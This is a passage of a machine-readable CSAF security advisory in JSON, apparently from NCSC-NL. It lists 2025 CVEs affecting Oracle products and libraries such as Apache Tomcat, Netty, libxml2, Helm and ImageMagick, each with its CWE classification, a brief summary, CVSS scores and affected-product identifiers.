"title": "CWE-674"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle WebLogic Server and Apache Commons Lang versions expose systems to denial of service risks, including an uncontrolled recursion flaw leading to StackOverflowErrors.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-48924 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-48924.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-48924"
},
{
"cve": "CVE-2025-48976",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "description",
"text": "Multiple vulnerabilities affecting Oracle Application Testing Suite and Apache Commons FileUpload, including DoS risks due to insufficient multipart header limits, have been identified, with CVSS scores reaching 7.5.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-48976 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-48976.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-48976"
},
{
"cve": "CVE-2025-48989",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "description",
"text": "Recent updates for Apache Tomcat versions 9, 10, and 11 address the \u0027MadeYouReset\u0027 DoS vulnerability in HTTP/2, along with various enhancements to components like Catalina and Coyote.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-48989 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-48989.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-48989"
},
{
"cve": "CVE-2025-49796",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "description",
"text": "Recent updates for libxml2 address multiple vulnerabilities, including heap use after free and type confusion, which could lead to denial of service or crashes, alongside an Oracle vulnerability allowing unauthorized data access.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-49796 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-49796.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-49796"
},
{
"cve": "CVE-2025-52999",
"cwe": {
"id": "CWE-121",
"name": "Stack-based Buffer Overflow"
},
"notes": [
{
"category": "other",
"text": "Stack-based Buffer Overflow",
"title": "CWE-121"
},
{
"category": "description",
"text": "Oracle Communications Unified Assurance has a vulnerability allowing denial of service, while jackson-core versions prior to 2.15.0 can cause StackoverflowError with deeply nested data, now mitigated in version 2.15.0.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-52999 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-52999.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-52999"
},
{
"cve": "CVE-2025-53547",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"title": "CWE-94"
},
{
"category": "description",
"text": "Helm v3.18.4 addresses a critical vulnerability allowing local code execution through crafted `Chart.yaml` and symlinked `Chart.lock` files during dependency updates, alongside an Oracle Communications flaw with a CVSS score of 8.6.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-53547 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-53547.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-53547"
},
{
"cve": "CVE-2025-53643",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"notes": [
{
"category": "other",
"text": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"title": "CWE-444"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle Communications Operations Monitor and aiohttp could allow unauthorized access and data manipulation, with significant integrity impacts and request smuggling risks in affected versions.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-53643 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-53643.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-53643"
},
{
"cve": "CVE-2025-53864",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Recursion",
"title": "CWE-674"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle GoldenGate and Connect2id Nimbus JOSE + JWT expose systems to denial of service attacks, with CVSS scores indicating significant availability impacts due to issues with deeply nested JSON objects.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-53864 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-53864.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-53864"
},
{
"cve": "CVE-2025-54090",
"cwe": {
"id": "CWE-253",
"name": "Incorrect Check of Function Return Value"
},
"notes": [
{
"category": "other",
"text": "Incorrect Check of Function Return Value",
"title": "CWE-253"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle Communications Cloud Native Core Automated Test Suite and Apache HTTP Server 2.4.64 expose systems to unauthorized data access and potential denial of service, with a CVSS score of 6.3 for the Oracle issue.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-54090 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-54090.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-54090"
},
{
"cve": "CVE-2025-55163",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Recent updates to Netty address critical vulnerabilities, including the \u0027MadeYouReset\u0027 DDoS attack in HTTP/2, which can lead to denial of service through resource exhaustion in various affected versions.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-55163 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-55163.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-55163"
},
{
"cve": "CVE-2025-57803",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"notes": [
{
"category": "other",
"text": "Heap-based Buffer Overflow",
"title": "CWE-122"
},
{
"category": "other",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
},
{
"category": "description",
"text": "ImageMagick has addressed critical vulnerabilities in its BMP encoder, including a 32-bit integer overflow leading to heap corruption and potential code execution, alongside other security enhancements.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-57803 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-57803.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-57803"
},
{
"cve": "CVE-2025-58057",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"notes": [
{
"category": "other",
"text": "Improper Handling of Highly Compressed Data (Data Amplification)",
"title": "CWE-409"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Multiple vulnerabilities in decompressing decoders, including `BrotliDecoder`, and components of Oracle and HPE products can lead to denial of service through excessive buffer allocation and malformed HTTP/2 frames.",
"title": "Summary"
},
{
"category": "general",
